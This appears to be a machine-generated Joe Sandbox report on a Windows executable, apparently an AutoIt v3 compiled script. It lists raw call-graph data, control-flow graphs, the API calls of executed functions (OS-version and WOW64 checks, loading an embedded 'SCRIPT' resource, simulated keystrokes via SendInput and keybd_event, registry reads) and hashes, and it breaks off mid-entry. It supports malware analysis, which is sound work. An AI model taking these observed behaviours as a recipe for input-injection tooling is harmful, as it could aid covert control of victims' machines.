d6f88 22 API calls 97838->97915 97839->97837 97843 112ce5 97841->97843 97842 d2ecf 97844 d9cb3 22 API calls 97842->97844 97926 d3084 22 API calls 97843->97926 97845 d2edc 97844->97845 97846 da81b 41 API calls 97845->97846 97848 d2eec 97846->97848 97850 d9cb3 22 API calls 97848->97850 97849 112d02 97927 d3084 22 API calls 97849->97927 97852 d2f12 97850->97852 97853 da81b 41 API calls 97852->97853 97856 d2f21 97853->97856 97854 112d1e 97855 d3a5a 24 API calls 97854->97855 97857 112d44 97855->97857 97860 da961 22 API calls 97856->97860 97928 d3084 22 API calls 97857->97928 97859 112d50 97929 da8c7 22 API calls __fread_nolock 97859->97929 97862 d2f3f 97860->97862 97916 d3084 22 API calls 97862->97916 97863 112d5e 97930 d3084 22 API calls 97863->97930 97866 d2f4b 97868 f4a28 _strftime 40 API calls 97866->97868 97867 112d6d 97931 da8c7 22 API calls __fread_nolock 97867->97931 97869 d2f59 97868->97869 97869->97843 97870 d2f63 97869->97870 97872 f4a28 _strftime 40 API calls 97870->97872 97874 d2f6e 97872->97874 97873 112d83 97932 d3084 22 API calls 97873->97932 97874->97849 97876 d2f78 97874->97876 97877 f4a28 _strftime 40 API calls 97876->97877 97879 d2f83 97877->97879 97878 112d90 97879->97854 97880 d2f8d 97879->97880 97881 f4a28 _strftime 40 API calls 97880->97881 97882 d2f98 97881->97882 97883 d2fdc 97882->97883 97917 d3084 22 API calls 97882->97917 97883->97867 97884 d2fe8 97883->97884 97884->97878 97920 d63eb 22 API calls 97884->97920 97887 d2fbf 97918 da8c7 22 API calls __fread_nolock 97887->97918 97888 d2ff8 97921 d6a50 22 API calls 97888->97921 97891 d2fcd 97919 d3084 22 API calls 97891->97919 97892 d3006 97922 d70b0 23 API calls 97892->97922 97897 d3021 97898 d3065 97897->97898 97923 d6f88 22 API calls 97897->97923 97924 d70b0 23 API calls 97897->97924 97925 d3084 22 API calls 97897->97925 97901 d4af0 __wsopen_s 97900->97901 97902 d6b57 22 API calls 97901->97902 97903 d4b22 97901->97903 97902->97903 97904 d4c6d 22 API calls 97903->97904 97910 d4b58 97903->97910 97904->97903 97905 d9cb3 22 API calls 97907 d4c52 97905->97907 97906 d9cb3 22 API calls 97906->97910 97908 d515f 22 API calls 97907->97908 97912 d4c5e 97908->97912 97909 d4c6d 22 API calls 97909->97910 97910->97906 97910->97909 97911 d515f 22 API calls 97910->97911 97913 d4c29 97910->97913 97911->97910 97912->97825 97913->97905 97913->97912 97914->97838 97915->97842 97916->97866 97917->97887 97918->97891 97919->97883 97920->97888 97921->97892 97922->97897 97923->97897 97924->97897 97925->97897 97926->97849 97927->97854 97928->97859 97929->97863 97930->97867 97931->97873 97932->97878 97933 d3156 97936 d3170 97933->97936 97937 d3187 97936->97937 97938 d318c 97937->97938 97939 d31eb 97937->97939 97976 d31e9 97937->97976 97943 d3199 97938->97943 97944 d3265 PostQuitMessage 97938->97944 97941 112dfb 97939->97941 97942 d31f1 97939->97942 97940 d31d0 DefWindowProcW 97968 d316a 97940->97968 97991 d18e2 10 API calls 97941->97991 97945 d321d SetTimer RegisterWindowMessageW 97942->97945 97946 d31f8 97942->97946 97948 d31a4 97943->97948 97949 112e7c 97943->97949 97944->97968 97953 d3246 CreatePopupMenu 97945->97953 97945->97968 97950 d3201 KillTimer 97946->97950 97951 112d9c 97946->97951 97954 d31ae 97948->97954 97955 112e68 97948->97955 97994 13bf30 34 API calls ___scrt_fastfail 97949->97994 97959 d30f2 Shell_NotifyIconW 97950->97959 97957 112da1 97951->97957 97958 112dd7 MoveWindow 97951->97958 97952 112e1c 97992 ee499 42 API calls 97952->97992 97953->97968 97962 d31b9 97954->97962 97963 112e4d 97954->97963 97981 13c161 97955->97981 97965 112da7 97957->97965 97966 112dc6 SetFocus 97957->97966 97958->97968 97967 d3214 97959->97967 97969 d31c4 97962->97969 97970 d3253 97962->97970 97963->97940 97993 130ad7 22 API calls 97963->97993 97964 112e8e 97964->97940 97964->97968 97965->97969 97971 112db0 97965->97971 97966->97968 97988 d3c50 DeleteObject DestroyWindow 97967->97988 97969->97940 97978 d30f2 Shell_NotifyIconW 97969->97978 97989 d326f 44 API calls ___scrt_fastfail 97970->97989 97990 d18e2 10 API calls 97971->97990 97976->97940 97977 d3263 97977->97968 97979 112e41 97978->97979 97980 d3837 49 API calls 97979->97980 97980->97976 97982 13c276 97981->97982 97983 13c179 ___scrt_fastfail 97981->97983 97982->97968 97984 d3923 24 API calls 97983->97984 97986 13c1a0 97984->97986 97985 13c25f KillTimer SetTimer 97985->97982 97986->97985 97987 13c251 Shell_NotifyIconW 97986->97987 97987->97985 97988->97968 97989->97977 97990->97968 97991->97952 97992->97969 97993->97976 97994->97964 97995 d1033 98000 d4c91 97995->98000 97999 d1042 98001 da961 22 API calls 98000->98001 98002 d4cff 98001->98002 98008 d3af0 98002->98008 98004 d4d9c 98006 d1038 98004->98006 98011 d51f7 22 API calls __fread_nolock 98004->98011 98007 f00a3 29 API calls __onexit 98006->98007 98007->97999 98012 d3b1c 98008->98012 98011->98004 98013 d3b0f 98012->98013 98014 d3b29 98012->98014 98013->98004 98014->98013 98015 d3b30 RegOpenKeyExW 98014->98015 98015->98013 98016 d3b4a RegQueryValueExW 98015->98016 98017 d3b80 RegCloseKey 98016->98017 98018 d3b6b 98016->98018 98017->98013 98018->98017

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 000D42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 234 d42de-d434d call da961 GetVersionExW call d6b57 239 113617-11362a 234->239 240 d4353 234->240 242 11362b-11362f 239->242 241 d4355-d4357 240->241 243 d435d-d43bc call d93b2 call d37a0 241->243 244 113656 241->244 245 113631 242->245 246 113632-11363e 242->246 262 1137df-1137e6 243->262 263 d43c2-d43c4 243->263 249 11365d-113660 244->249 245->246 246->242 248 113640-113642 246->248 248->241 251 113648-11364f 248->251 252 d441b-d4435 GetCurrentProcess IsWow64Process 249->252 253 113666-1136a8 249->253 251->239 255 113651 251->255 258 d4494-d449a 252->258 259 d4437 252->259 253->252 256 1136ae-1136b1 253->256 255->244 260 1136b3-1136bd 256->260 261 1136db-1136e5 256->261 264 d443d-d4449 258->264 259->264 265 1136ca-1136d6 260->265 266 1136bf-1136c5 260->266 268 1136e7-1136f3 261->268 269 1136f8-113702 261->269 270 113806-113809 262->270 271 1137e8 262->271 263->249 267 d43ca-d43dd 263->267 272 d444f-d445e LoadLibraryA 264->272 273 113824-113828 GetSystemInfo 264->273 265->252 266->252 276 113726-11372f 267->276 277 d43e3-d43e5 267->277 268->252 279 113715-113721 269->279 280 113704-113710 269->280 281 1137f4-1137fc 270->281 282 11380b-11381a 270->282 278 1137ee 271->278 274 d449c-d44a6 GetSystemInfo 272->274 275 d4460-d446e GetProcAddress 272->275 284 d4476-d4478 274->284 275->274 283 d4470-d4474 GetNativeSystemInfo 275->283 287 113731-113737 276->287 288 11373c-113748 276->288 285 d43eb-d43ee 277->285 286 11374d-113762 277->286 278->281 279->252 280->252 281->270 282->278 289 11381c-113822 282->289 283->284 292 d447a-d447b FreeLibrary 284->292 293 d4481-d4493 284->293 294 113791-113794 285->294 295 d43f4-d440f 285->295 290 113764-11376a 286->290 291 11376f-11377b 286->291 287->252 288->252 289->281 290->252 291->252 292->293 294->252 296 11379a-1137c1 294->296 297 113780-11378c 295->297 298 d4415 295->298 299 1137c3-1137c9 296->299 300 1137ce-1137da 296->300 297->252 298->252 299->252 300->252
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 000D430D
                                                                                                                                                                                                                                            • Part of subcall function 000D6B57: _wcslen.LIBCMT ref: 000D6B6A
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,0016CB64,00000000,?,?), ref: 000D4422
                                                                                                                                                                                                                                          • IsWow64Process.KERNEL32(00000000,?,?), ref: 000D4429
                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 000D4454
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 000D4466
                                                                                                                                                                                                                                          • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 000D4474
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 000D447B
                                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,?,?), ref: 000D44A0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                                                                                          • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                                                                                          • API String ID: 3290436268-3101561225
                                                                                                                                                                                                                                          • Opcode ID: 7826043a325f518e12c4acccdd1e63e68ddfe805c36c431ee7ea727eea0d9374
                                                                                                                                                                                                                                          • Instruction ID: 7d17e62b357c203bec40248ff4a0c8e563a13789a86cd6f83947f9259eb53e5a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7826043a325f518e12c4acccdd1e63e68ddfe805c36c431ee7ea727eea0d9374
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9A14F6690A3D0EFCF15CF6A6C411E97EA47F27360F0848AAD09197F66D6704ACCCB61
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000D42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 638 d42a2-d42ba CreateStreamOnHGlobal 639 d42bc-d42d3 FindResourceExW 638->639 640 d42da-d42dd 638->640 641 d42d9 639->641 642 1135ba-1135c9 LoadResource 639->642 641->640 642->641 643 1135cf-1135dd SizeofResource 642->643 643->641 644 1135e3-1135ee LockResource 643->644 644->641 645 1135f4-113612 644->645 645->641
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,000D50AA,?,?,00000000,00000000), ref: 000D42B2
                                                                                                                                                                                                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,000D50AA,?,?,00000000,00000000), ref: 000D42C9
                                                                                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000,?,?,000D50AA,?,?,00000000,00000000,?,?,?,?,?,?,000D4F20), ref: 001135BE
                                                                                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000,?,?,000D50AA,?,?,00000000,00000000,?,?,?,?,?,?,000D4F20), ref: 001135D3
                                                                                                                                                                                                                                          • LockResource.KERNEL32(000D50AA,?,?,000D50AA,?,?,00000000,00000000,?,?,?,?,?,?,000D4F20,?), ref: 001135E6
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                          • String ID: SCRIPT
                                                                                                                                                                                                                                          • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                          • Opcode ID: e86b68f34031ee672bfd979f5551230146110693aded3cf1ca022cfe26db4330
                                                                                                                                                                                                                                          • Instruction ID: 6b686991afd205787a0c7732fdf5853b6df7b4596bfe609d39a321bc86fbe15b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e86b68f34031ee672bfd979f5551230146110693aded3cf1ca022cfe26db4330
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38117C70600701BFE7218B65DC48F777BBAEBC5B51F10416EF846D6650DBB1D8408AB0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 879 13ab9c-13abc0 880 13abc6-13abc9 879->880 881 13ac7c-13ac7f 879->881 880->881 882 13abcf-13abd2 880->882 883 13aca2-13acc6 SendInput 881->883 884 13ac81-13ac8d call 139e8d 881->884 882->881 886 13abd8-13abdb 882->886 885 13accc-13acce call 139c49 883->885 891 13ac93 884->891 892 13ac8f-13ac91 884->892 893 13acd3-13acd7 885->893 886->881 890 13abe1-13abe4 886->890 890->885 894 13abea-13abf9 GetKeyboardState 890->894 897 13ac95-13ac9b call 13b226 891->897 892->897 895 13ac13-13ac2d call 139e8d 894->895 896 13abfb-13ac0d SetKeyboardState 894->896 902 13ac38-13ac3c 895->902 903 13ac2f-13ac32 895->903 896->895 901 13aca0 897->901 901->885 904 13ac49-13ac4d 902->904 905 13ac3e-13ac42 902->905 903->902 907 13ac67-13ac6c 904->907 908 13ac4f-13ac53 904->908 905->904 906 13ac44-13ac47 905->906 906->904 906->907 910 13ac71-13ac7a PostMessageW 907->910 908->907 909 13ac55-13ac65 908->909 909->910 910->885
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 0013ABF1
                                                                                                                                                                                                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 0013AC0D
                                                                                                                                                                                                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 0013AC74
                                                                                                                                                                                                                                          • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 0013ACC6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 432972143-0
                                                                                                                                                                                                                                          • Opcode ID: 56ae58f4aec6249042cb0b97a53423a59017c40e2faf805e56a465ba3ed47526
                                                                                                                                                                                                                                          • Instruction ID: a80315fd21fecc92dca7d14df596a7f26afcfd379fb5cb60e506059fa9ecb00d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56ae58f4aec6249042cb0b97a53423a59017c40e2faf805e56a465ba3ed47526
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D310730A047186FFF35CB65CC087FA7BA5AF89320F88631AE4C5962D1C3759D858792
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000F4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(001028E9,?,000F4CBE,001028E9,001988B8,0000000C,000F4E15,001028E9,00000002,00000000,?,001028E9), ref: 000F4D09
                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,000F4CBE,001028E9,001988B8,0000000C,000F4E15,001028E9,00000002,00000000,?,001028E9), ref: 000F4D10
                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 000F4D22
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                          • Opcode ID: 0cb621565c0fc7cea72a26d14ffe8cf00bea6b915b6644e17f76d638fb0e9375
                                                                                                                                                                                                                                          • Instruction ID: d7e61a0f60e35e136d50f815e37089857063f3339717f4034bfef43d561ef0d6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0cb621565c0fc7cea72a26d14ffe8cf00bea6b915b6644e17f76d638fb0e9375
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2E0B631000148ABDF11AF54DD09AAA3F69FB85781B104014FD558AA22DB75DE82DA80
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0013B25D
                                                                                                                                                                                                                                          • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 0013B270
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InputSendkeybd_event
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3536248340-0
                                                                                                                                                                                                                                          • Opcode ID: d4686b86d752414633f6f49a6697a21c73d6fabe172cbe93a8cffe6263d52944
                                                                                                                                                                                                                                          • Instruction ID: 129cef8c3feb2e3ae9bd81f1b87380e04f136e1b9536584d83f00fcd5e9dfe0f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4686b86d752414633f6f49a6697a21c73d6fabe172cbe93a8cffe6263d52944
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7AF06D7080428EABDB058FA0C806BBE7BB0FF04309F00800AF961A5192D3B992019F94
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000DD730 Relevance: 21.6, APIs: 14, Instructions: 621windowsleeptimeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetInputState.USER32 ref: 000DD807
                                                                                                                                                                                                                                          • timeGetTime.WINMM ref: 000DDA07
                                                                                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000DDB28
                                                                                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 000DDB7B
                                                                                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 000DDB89
                                                                                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000DDB9F
                                                                                                                                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 000DDBB1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2189390790-0
                                                                                                                                                                                                                                          • Opcode ID: 5afd87e745467ff18c6ef15000c131b669729f0e449d2f9dfc5da5d2339c9140
                                                                                                                                                                                                                                          • Instruction ID: 5e6ff793702465c589b656db54e00acf0615554901bb01a725efb9b68b3133df
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5afd87e745467ff18c6ef15000c131b669729f0e449d2f9dfc5da5d2339c9140
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F42FF30608352EFD728CF24D894BAEBBE1BF46314F14851BE49587791D7B1E894CBA2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000D2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 000D2D07
                                                                                                                                                                                                                                          • RegisterClassExW.USER32(00000030), ref: 000D2D31
                                                                                                                                                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000D2D42
                                                                                                                                                                                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 000D2D5F
                                                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000D2D6F
                                                                                                                                                                                                                                          • LoadIconW.USER32(000000A9), ref: 000D2D85
                                                                                                                                                                                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000D2D94
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                          • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                          • Opcode ID: 0e127a83505104bf8da1056f24c946fd3d29a1577acbc3664542426a32c007ca
                                                                                                                                                                                                                                          • Instruction ID: abac06fb62a7f57f07ded210401c3a14421a152d429f7e5f86b2b632a504aceb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e127a83505104bf8da1056f24c946fd3d29a1577acbc3664542426a32c007ca
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0521F2B5901318AFDB00DFA4EC89BEEBBB4FB09714F00811AF951A66A0D7B50584CF91
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0011065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
